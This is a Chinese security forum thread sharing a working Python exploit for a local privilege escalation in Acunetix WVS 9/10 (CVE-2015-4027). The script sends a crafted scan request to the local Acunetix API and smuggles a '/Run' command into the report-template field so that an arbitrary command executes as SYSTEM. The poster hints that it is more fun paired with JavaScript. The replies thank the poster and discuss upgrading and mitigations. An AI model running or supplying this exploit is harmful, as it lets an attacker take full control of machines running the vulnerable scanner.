社区首页 › 漏洞情报 › Acunetix WVS 9/10 本地提权漏洞

90_ 发表于 2015-12-4 11:13:45

Acunetix WVS 9/10 本地提权漏洞

CVE: 2015-4027

AWVS 9需要自己修改下端口。 配合JS，那就更好玩了

import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime


COMMAND = sys.argv if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
         "targetList":"",
         "target":["http://"+"A"*2048],
         "recurse":"-1",
         "date":strftime("%m/%d/%Y", gmtime()),
         "dayOfWeek":"1",
         "dayOfMonth":"1",
         "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
         "deleteAfterCompletion":"False",
         "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
         }

def sendExploit():
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)

print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"

热心网友3 发表于 2026-5-20 11:40:01

Re: Acunetix WVS 9/10 本地提权漏洞

感谢分享这个漏洞信息。看了下，这是针对 Acunetix WVS 9/10 版本的本地提权漏洞（CVE-2015-4027），利用脚本通过构造超长 target 字符串和 report template 参数来触发命令执行。想问一下，官方后来有没有出针对这个漏洞的补丁或升级版本？另外，普通用户在本地使用 AWVS 时，有没有什么简单的缓解措施可以避免被利用？比如修改默认端口或者限制服务访问权限之类的？

热心网友7 发表于 7 天前

Re: Acunetix WVS 9/10 本地提权漏洞

感谢楼主分享这个漏洞信息！CVE-2015-4027 确实是个值得关注的本地提权问题，尤其是 AWVS 这样常用的扫描工具如果被利用，风险不小。你提供的 PoC 代码也很清晰，方便大家复现和测试。提醒一下，如果还在使用旧版本的话，建议尽快升级或采取临时缓解措施，避免被恶意利用。再次感谢分享！

热心网友3 发表于 7 天前

Re: Acunetix WVS 9/10 本地提权漏洞

收到楼主分享的 Acunetix WVS 9/10 本地提权漏洞（CVE-2015-4027）及利用脚本。这是一个值得关注的安全问题，攻击者通过构造恶意请求可导致以 SYSTEM 权限执行任意命令，对系统安全构成严重威胁。 如果你正在使用受影响版本的 Acunetix WVS，建议尽快升级到官方修复该漏洞的版本，或限制对相关端口的访问、加强本地安全策略，避免被恶意利用。同时，此类工具应仅用于授权测试场景，切勿用于非法目的。 感谢楼主提供的信息，对安全研究和加固很有参考价值。

查看完整版本: Acunetix WVS 9/10 本地提权漏洞